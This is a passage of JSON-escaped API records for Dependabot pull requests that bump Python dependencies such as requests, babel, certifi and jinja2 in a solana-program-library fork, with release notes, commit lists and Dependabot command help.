href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `requests` from 2.32.0 to 2.32.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/releases\"\u003erequests's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev2.32.4\u003c/h2\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6965\"\u003e#6965\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6926\"\u003e#6926\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.3\u003c/h2\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.2\u003c/h2\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev2.32.1\u003c/h2\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/psf/requests/blob/main/HISTORY.md\"\u003erequests's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.32.4 (2025-06-10)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eSecurity\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eCVE-2024-47081 Fixed an issue where a maliciously crafted URL and trusted\nenvironment will retrieve credentials for the wrong hostname/machine from a\nnetrc file.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eImprovements\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eNumerous documentation improvements\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdded support for pypy 3.11 for Linux and macOS.\u003c/li\u003e\n\u003cli\u003eDropped support for pypy 3.9 following its end of support.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.3 (2024-05-29)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFixed bug breaking the ability to specify custom SSLContexts in sub-classes of\nHTTPAdapter. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6716\"\u003e#6716\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFixed issue where Requests started failing to run on Python versions compiled\nwithout the \u003ccode\u003essl\u003c/code\u003e module. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6724\"\u003e#6724\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.2 (2024-05-21)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eDeprecations\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003eTo provide a more stable migration for custom HTTPAdapters impacted\nby the CVE changes in 2.32.0, we've renamed \u003ccode\u003e_get_connection\u003c/code\u003e to\na new public API, \u003ccode\u003eget_connection_with_tls_context\u003c/code\u003e. Existing custom\nHTTPAdapters will need to migrate their code to use this new API.\n\u003ccode\u003eget_connection\u003c/code\u003e is considered deprecated in all versions of Requests\u0026gt;=2.32.0.\u003c/p\u003e\n\u003cp\u003eA minimal (2-line) example has been provided in the linked PR to ease\nmigration, but we strongly urge users to evaluate if their custom adapter\nis subject to the same issue described in CVE-2024-35195. (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6710\"\u003e#6710\u003c/a\u003e)\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e2.32.1 (2024-05-20)\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eBugfixes\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd missing test certs to the sdist distributed on PyPI.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/021dc729f0b71a3030cefdbec7fb57a0e80a6cfd\"\u003e\u003ccode\u003e021dc72\u003c/code\u003e\u003c/a\u003e Polish up release tooling for last manual release\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/821770e822a20a21b207b3907ea83878bda1d396\"\u003e\u003ccode\u003e821770e\u003c/code\u003e\u003c/a\u003e Bump version and add release notes for v2.32.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/59f8aa2adf1d3d06bcbf7ce6b13743a1639a5401\"\u003e\u003ccode\u003e59f8aa2\u003c/code\u003e\u003c/a\u003e Add netrc file search information to authentication documentation (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6876\"\u003e#6876\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/5b4b64c3467fd7a3c03f91ee641aaa348b6bed3b\"\u003e\u003ccode\u003e5b4b64c\u003c/code\u003e\u003c/a\u003e Add more tests to prevent regression of CVE 2024 47081\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7bc45877a86192af77645e156eb3744f95b47dae\"\u003e\u003ccode\u003e7bc4587\u003c/code\u003e\u003c/a\u003e Add new test to check netrc auth leak (\u003ca href=\"https://redirect.github.com/psf/requests/issues/6962\"\u003e#6962\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/96ba401c1296ab1dda74a2365ef36d88f7d144ef\"\u003e\u003ccode\u003e96ba401\u003c/code\u003e\u003c/a\u003e Only use hostname to do netrc lookup instead of netloc\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/7341690e842a23cf18ded0abd9229765fa88c4e2\"\u003e\u003ccode\u003e7341690\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/psf/requests/issues/6951\"\u003e#6951\u003c/a\u003e from tswast/patch-1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/6716d7c9f29df636643fa2489f98890216525cb0\"\u003e\u003ccode\u003e6716d7c\u003c/code\u003e\u003c/a\u003e remove links\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/a7e1c745dc23c18e836febd672416ed0c5d8d8ae\"\u003e\u003ccode\u003ea7e1c74\u003c/code\u003e\u003c/a\u003e Update docs/conf.py\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/psf/requests/commit/c799b8167a13416833ad3b4f3298261a477e826f\"\u003e\u003ccode\u003ec799b81\u003c/code\u003e\u003c/a\u003e docs: fix dead links to kenreitz.org\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/psf/requests/compare/v2.32.0...v2.32.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot merge` will merge this PR after your CI passes on it\n- `@dependabot squash and merge` will squash and merge this PR after your CI passes on it\n- `@dependabot cancel merge` will cancel a previously requested merge and block automerging\n- `@dependabot reopen` will reopen this PR if it is closed\n- `@dependabot close` will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Melissa-Forbs/solana-program-library/network/alerts).\n\n\u003c/details\u003e","html_url":"https://github.com/Melissa-Forbs/solana-program-library/pull/1592","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Melissa-Forbs%2Fsolana-program-library/issues/1592","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/1592/packages"},{"uuid":"2579758634","node_id":"PR_kwDOFS5VgM6Zw_4q","number":3,"state":"open","title":"Bump the pip group across 1 directory with 7 updates","user":"dependabot[bot]","labels":["dependencies","python"],"assignees":[],"locked":false,"comments_count":0,"pull_request":true,"closed_at":null,"author_association":"NONE","state_reason":null,"created_at":"2025-06-10T00:22:19.000Z","updated_at":"2025-06-10T00:22:20.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"pip","update_count":7,"packages":[{"name":"py","old_version":"1.10.0","new_version":"1.11.0","repository_url":"https://github.com/pytest-dev/py"},{"name":"babel","old_version":"2.9.0","new_version":"2.9.1","repository_url":"https://github.com/python-babel/babel"},{"name":"certifi","old_version":"2020.12.5","new_version":"2024.7.4","repository_url":"https://github.com/certifi/python-certifi"},{"name":"jinja2","old_version":"2.11.3","new_version":"3.1.6","repository_url":"https://github.com/pallets/jinja"},{"name":"requests","old_version":"2.25.1","new_version":"2.32.4","repository_url":"https://github.com/psf/requests"},{"name":"urllib3","old_version":"1.26.4","new_version":"1.26.19","repository_url":"https://github.com/urllib3/urllib3"},{"name":"virtualenv","old_version":"20.4.2","new_version":"20.26.6","repository_url":"https://github.com/pypa/virtualenv"}],"path":null,"ecosystem":"pip"},"body":"Bumps the pip group with 7 updates in the /requirements directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [py](https://github.com/pytest-dev/py) | `1.10.0` | `1.11.0` |\n| [babel](https://github.com/python-babel/babel) | `2.9.0` | `2.9.1` |\n| [certifi](https://github.com/certifi/python-certifi) | `2020.12.5` | `2024.7.4` |\n| [jinja2](https://github.com/pallets/jinja) | `2.11.3` | `3.1.6` |\n| [requests](https://github.com/psf/requests) | `2.25.1` | `2.32.4` |\n| [urllib3](https://github.com/urllib3/urllib3) | `1.26.4` | `1.26.19` |\n| [virtualenv](https://github.com/pypa/virtualenv) | `20.4.2` | `20.26.6` |\n\n\nUpdates `py` from 1.10.0 to 1.11.0\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pytest-dev/py/blob/master/CHANGELOG.rst\"\u003epy's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e1.11.0 (2021-11-04)\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSupport Python 3.11\u003c/li\u003e\n\u003cli\u003eSupport \u003ccode\u003eNO_COLOR\u003c/code\u003e environment variable\u003c/li\u003e\n\u003cli\u003eUpdate vendored apipkg: 1.5 =\u0026gt; 2.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/447bac514febbb5433963582103d48bb27b3db17\"\u003e\u003ccode\u003e447bac5\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/6d003d9fee08542b9a5ca663568cb30c75d6c27c\"\u003e\u003ccode\u003e6d003d9\u003c/code\u003e\u003c/a\u003e Update CHANGELOG.rst\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/9cf613f3c21ca31f4a1ee9a70e6bd31dc3fe42d9\"\u003e\u003ccode\u003e9cf613f\u003c/code\u003e\u003c/a\u003e Declare support for Python 3.8-3.10\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/d831150a3502363c9ca7242122d8e6cbd229169e\"\u003e\u003ccode\u003ed831150\u003c/code\u003e\u003c/a\u003e Update python_requires: Python 3.4 was already dropped\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e68532e9d67b089b17f1c96a708ff5f8ccf8bc8b\"\u003e\u003ccode\u003ee68532e\u003c/code\u003e\u003c/a\u003e Update CHANGELOG for 1.11.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/2f03e5a7fd9eb95db110cfd1bf40b987757f9d48\"\u003e\u003ccode\u003e2f03e5a\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/258\"\u003e#258\u003c/a\u003e from blueyed/NO_COLOR\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/e116b2bb8e1da9e8aef33c3606bd3d357ae28570\"\u003e\u003ccode\u003ee116b2b\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/pytest-dev/py/issues/275\"\u003e#275\u003c/a\u003e from pytest-dev/upgrade-vendor-libs\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f3a1a59d7d701a76680c2d0b0bd582311b00ded0\"\u003e\u003ccode\u003ef3a1a59\u003c/code\u003e\u003c/a\u003e remove build pin again\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/f6cbf2814a2cc355d0a795233a32dc1285eec93b\"\u003e\u003ccode\u003ef6cbf28\u003c/code\u003e\u003c/a\u003e try to use pipx tox\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pytest-dev/py/commit/3fe9ad76257860bfcdb25a23539972759ce348ed\"\u003e\u003ccode\u003e3fe9ad7\u003c/code\u003e\u003c/a\u003e try to use preinstalled tox\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pytest-dev/py/compare/1.10.0...1.11.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `babel` from 2.9.0 to 2.9.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/releases\"\u003ebabel's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003ch1\u003eBugfixes\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eThe internal locale-data loading functions now validate the name of the locale file to be loaded and only allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/python-babel/babel/blob/master/CHANGES.rst\"\u003ebabel's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eVersion 2.9.1\u003c/h2\u003e\n\u003cp\u003eBugfixes\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n* The internal locale-data loading functions now validate the name of the locale file to be loaded and only\n  allow files within Babel's data directory.  Thank you to Chris Lyne of Tenable, Inc. for discovering the issue!\n\u003c/code\u003e\u003c/pre\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/a99fa2474c808b51ebdabea18db871e389751559\"\u003e\u003ccode\u003ea99fa24\u003c/code\u003e\u003c/a\u003e Use 2.9.0's setup.py for 2.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/60b33e083801109277cb068105251e76d0b7c14e\"\u003e\u003ccode\u003e60b33e0\u003c/code\u003e\u003c/a\u003e Become 2.9.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/412015ef642bfcc0d8ba8f4d05cdbb6aac98d9b3\"\u003e\u003ccode\u003e412015e\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/782\"\u003e#782\u003c/a\u003e from python-babel/locale-basename\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/5caf717ceca4bd235552362b4fbff88983c75d8c\"\u003e\u003ccode\u003e5caf717\u003c/code\u003e\u003c/a\u003e Disallow special filenames on Windows\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/3a700b5b8b53606fd98ef8294a56f9510f7290f8\"\u003e\u003ccode\u003e3a700b5\u003c/code\u003e\u003c/a\u003e Run locale identifiers through \u003ccode\u003eos.path.basename()\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/5afe2b2f11dcdd6090c00231d342c2e9cd1bdaab\"\u003e\u003ccode\u003e5afe2b2\u003c/code\u003e\u003c/a\u003e Merge pull request \u003ca href=\"https://redirect.github.com/python-babel/babel/issues/754\"\u003e#754\u003c/a\u003e from python-babel/github-ci\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/58de8342f865df88697a4a166191e880e3c84d82\"\u003e\u003ccode\u003e58de834\u003c/code\u003e\u003c/a\u003e Replace Travis + Appveyor with GitHub Actions (WIP)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/d1bbc08e845d03d8e1f0dfa0e04983d755f39cb5\"\u003e\u003ccode\u003ed1bbc08\u003c/code\u003e\u003c/a\u003e import_cldr: use logging; add -q option\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/156b7fb9f377ccf58c71cf01dc69fb10c7b69314\"\u003e\u003ccode\u003e156b7fb\u003c/code\u003e\u003c/a\u003e Quiesce CLDR download progress bar if requested (or not a TTY)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/python-babel/babel/commit/613dc1700f91c3d40b081948c0dd6023d8ece057\"\u003e\u003ccode\u003e613dc17\u003c/code\u003e\u003c/a\u003e Make the import warnings about unsupported number systems less verbose\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/python-babel/babel/compare/v2.9.0...v2.9.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `certifi` from 2020.12.5 to 2024.7.4\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/bd8153872e9c6fc98f4023df9c2deaffea2fa463\"\u003e\u003ccode\u003ebd81538\u003c/code\u003e\u003c/a\u003e 2024.07.04 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/295\"\u003e#295\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/06a2cbf21f345563dde6c28b60e29d57e9b210b3\"\u003e\u003ccode\u003e06a2cbf\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.5 to 6.1.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/294\"\u003e#294\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/13bba02b72bac97c432c277158bc04b4d2a6bc23\"\u003e\u003ccode\u003e13bba02\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/293\"\u003e#293\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/e8abcd0e62b334c164b95d49fcabdc9ecbca0554\"\u003e\u003ccode\u003ee8abcd0\u003c/code\u003e\u003c/a\u003e Bump pypa/gh-action-pypi-publish from 1.8.14 to 1.9.0 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/292\"\u003e#292\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/124f4adf171e15cd9a91a8b6e0325ecc97be8fe1\"\u003e\u003ccode\u003e124f4ad\u003c/code\u003e\u003c/a\u003e 2024.06.02 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/291\"\u003e#291\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/c2196ce5d6ee675b27755a19948480a7823e2c6a\"\u003e\u003ccode\u003ec2196ce\u003c/code\u003e\u003c/a\u003e --- (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/290\"\u003e#290\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/fefdeec7588ff1c05214b85a552afcad5fdb51b2\"\u003e\u003ccode\u003efefdeec\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.4 to 4.1.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/289\"\u003e#289\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/3c5fb1560b826a7f83f1f9750173ff766492c9cf\"\u003e\u003ccode\u003e3c5fb15\u003c/code\u003e\u003c/a\u003e Bump actions/download-artifact from 4.1.6 to 4.1.7 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/286\"\u003e#286\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/4a9569a3eb58db8548536fc16c5c5c7af946a5b1\"\u003e\u003ccode\u003e4a9569a\u003c/code\u003e\u003c/a\u003e Bump actions/checkout from 4.1.2 to 4.1.4 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/287\"\u003e#287\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/certifi/python-certifi/commit/1fc808626a895a916b1e4c2b63abae6c5eafdbe3\"\u003e\u003ccode\u003e1fc8086\u003c/code\u003e\u003c/a\u003e Bump peter-evans/create-pull-request from 6.0.4 to 6.0.5 (\u003ca href=\"https://redirect.github.com/certifi/python-certifi/issues/288\"\u003e#288\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/certifi/python-certifi/compare/2020.12.05...2024.07.04\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jinja2` from 2.11.3 to 